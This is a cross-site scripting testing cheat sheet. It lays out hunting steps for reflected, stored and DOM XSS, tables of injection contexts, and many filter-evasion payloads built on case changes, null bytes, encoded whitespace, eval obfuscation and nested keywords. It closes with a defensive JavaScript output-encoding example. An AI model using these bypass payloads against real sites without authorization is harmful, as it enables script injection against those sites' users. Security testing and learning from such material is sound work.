XSS Cheat sheet
Active XSS hunting
Attack strategy
Types of XSS
 | Reflected XSS | Stored XSS | DOM XSS |
---|---|---|---|
Value reflection | Value is not stored in a database; it comes straight from a GET or POST parameter | Value is stored in a database and read back from there | Value is written into a DOM sink by client-side JavaScript |
Test objectives | Identify where a value is reflected into the response, then assess the input it accepts and see whether any filters can be bypassed | Identify where a value is stored in the DB and reflected back onto the page, then assess the input it accepts and see whether any filters can be bypassed | Identify where a value is put into a DOM sink and reflected back onto the page, then assess the input it accepts and see whether any filters can be bypassed |
Step 1 | Detect input vectors by testing ALL parameters | Detect input vectors by testing ALL parameters | Static code review works best for this |
Step 2 | Analyse the results depending on the context | Analyse the results depending on the context | Find the DOM sinks by entering a random value and looking at the developer console; locate where the value is reflected and in which context |
Step 3 | Check the impact of the attack vector | Check the impact of the attack vector | The tester MUST use the developer console (Inspect) and not View Source, since View Source will not show DOM elements created at runtime |
Passive XSS hunting
Attack strategy
Enter ``"'`><u>Rat was here<img src=x>`` into every field you see:
- Name, last name, address, ... at registration
- Names and content of every object you create
- EVERYWHERE
If you encounter a value that's reflected, determine context.
Contexts
 | JavaScript context | HTML tag context | HTML tag attribute context |
---|---|---|---|
Attack vector | `` '"` `` | `<u>Rat was here` + `<img src=x>` | `` "'`> `` |
Breaks | Breaks JavaScript functions | Nothing: the value is reflected into the HTML context without sanitisation, allowing our own tags | Breaks out of an HTML tag attribute, such as the `value` attribute of an `<input>` tag |
Exploit | Try to insert our own JS code | Add event handlers to tags | Insert a JS event handler or JS code into the tag |
Example | `'); alert(); —` | `<img src=x onerror=alert()>` | `' alert(); '` |
Filter evasion
Techniques
Name | Tags | Notes |
---|---|---|
Basic modifications | `<script>alert(1)</script>` <br> Added space: `<script >alert(1)</script>` <br> Encoded tab / newline / carriage return: `<script%09>alert(1)</script>` `<script%0a>alert(1)</script>` `<script%0d>alert(1)</script>` <br> Capital letters: `<ScRipT>alert(1)</sCriPt>` <br> Adding null bytes: `<%00script>alert(1)</script>` `<script>al%00ert(1)</script>` | Doing basic things like adding spaces and encoding tabs, newlines and carriage returns can already do a lot |
Attributes and tags | Baseline: `<input type="text" name="input" value="hello">` <br> Break out of the value: `<input type="text" name="input" value="><script>alert(1)</script>` <br> Unknown tag: `<randomtag type="text" name="input" value="><script>alert(1)</script>` <br> Slash instead of space: `<input/type="text" name="input" value="><script>alert(1)</script>` <br> Encoded tab / newline / carriage return: `<input%09type="text" name="input" value="><script>alert(1)</script>` `<input%0atype="text" name="input" value="><script>alert(1)</script>` `<input%0dtype="text" name="input" value="><script>alert(1)</script>` <br> Slash and quote: `<input/'type="text" name="input" value="><script>alert(1)</script>` <br> Capital letters: `<iNpUt type="text" name="input" value="><script>alert(1)</script>` <br> Null bytes: `<%00input type="text" name="input" value="><script>alert(1)</script>` `<inp%00ut type="text" name="input" value="><script>alert(1)</script>` `<input t%00ype="text" name="input" value="><script>alert(1)</script>` `<input type="text" name="input" value="><script>a%00lert(1)</script>` | We can apply the same basic modifications to tags and attributes, and add things like null bytes |
Event handlers | Use Burp Intruder: take the event handler that is blocked as the insertion point and use the PortSwigger cheat sheet to test all event handlers | Try all the different event handlers from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet with Burp Intruder |
Delimiters and brackets | Quotes: `<img onerror="alert(1)"src=x>` `<img onerror='alert(1)'src=x>` <br> URL-encoded quotes: `<img onerror=%22alert(1)%22src=x>` `<img onerror=%27alert(1)%27src=x>` <br> Backticks: ``<img onerror=`alert(1)`src=x>`` <br> Encoded backticks: `<img onerror=%60alert(1)%60src=x>` | Sometimes we can play with things like delimiters by encoding them if they are blocked |
Delimiters and brackets - 2 | Double use of delimiters: `<<script>alert(1)//<</script>` <br> Unknown delimiters: `«input onsubmit=alert(1)»` <br> Encoded: `®input onsubmit=alert(1)¯` | |
Eval() | `<script>eval('a\u006cert(1)')</script>` <br> `<script>eval('al' + 'ert(1)')</script>` <br> `<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>` | We can also use the eval() function in JS to obfuscate strings so they are not caught by the filter |
Using filtered words in filtered words | If `script` is filtered, `<scrscriptipt>` might become `<script>` after one pass of the filter | This helped me find many bounties 😂 |
Use your imagination <3 | | |
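A defender-side counterpart to the two tables above, added here as an example and not part of the original cheat sheet: it shows why a filter that strips `script` once is undone by the nested-word trick in the last row, and what context-aware output encoding for the JavaScript, HTML tag and HTML attribute contexts looks like. The function names and templates are my own; the probe string is the one from the passive hunting section.

```javascript
// Added example: blocklist filtering versus context-aware output encoding.
// Plain Node.js, no dependencies.

// Constructed: the probe string from the "Passive XSS hunting" section.
const PROBE = "\"'`><u>Rat was here<img src=x>";

// Naive blocklist filter: removes the literal word "script" in one pass.
// Running it again would not help either; the fix is to encode, not to strip.
function naiveStripScript(input) {
  return input.replace(/script/gi, "");
}

// HTML tag context and quoted attribute context: replace every character
// that can open a tag, close a quote, or end an attribute value.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "`": "&#x60;",
};
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string context: hex-escape everything that is not alphanumeric,
// so quotes, backticks, "</script>" and line terminators stay inside the literal.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Template for the <input> row of the filter-evasion table: the attribute is
// quoted by the template itself, so the encoded value cannot close it.
function renderInput(value) {
  return `<input type="text" name="input" value="${encodeForHtml(value)}">`;
}

// Template for the JavaScript context column: the value sits in a JS string.
function renderScriptVar(value) {
  return `<script>var name = '${encodeForJsString(value)}';</script>`;
}
```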